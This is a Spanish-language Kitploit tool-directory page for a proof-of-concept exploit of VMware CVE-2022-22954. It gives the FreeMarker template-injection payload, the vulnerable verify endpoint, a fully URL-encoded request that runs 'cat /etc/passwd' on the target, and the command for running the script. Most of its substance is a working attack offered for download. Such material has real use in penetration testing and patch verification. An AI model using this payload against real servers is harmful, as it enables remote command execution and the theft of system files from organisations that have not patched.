Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
VMware-CVE-2022-22954-Command-Injector — Prueba de concepto para explotar VMware CVE-2022-22954 | Kitploit
Herramientas/GitHubGitHub/emilyastranova/vmware-cve-2022-22954-command-injector
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubemilyastranova/vmware-cve-2022-22954-command-injector

VMware-CVE-2022-22954-Command-Injector

Prueba de concepto para explotar VMware CVE-2022-22954

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
11hace 4 añosAún no revisado

VMware-CVE-2022-22954-Command-Injector

Prueba de concepto para explotar VMware CVE-2022-22954

Cómo funciona

Este simple script de Python realiza una solicitud GET a la URL especificada, añadiendo /catalog-portal/ui/oauth/verify?error=&deviceUdid= y luego seguido de una versión codificada en URL de esta cadena:

root@kitploit:~
${"freemarker.template.utility.Execute"?new()("command")}

Por ejemplo, una salida para "cat /etc/passwd" sería la siguiente: {host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Instrucciones

root@kitploit:~
python3 exploit.py <URL>

Referencias

  • https://github.com/sherlocksecurity/VMware-CVE-2022-22954
Descargar herramienta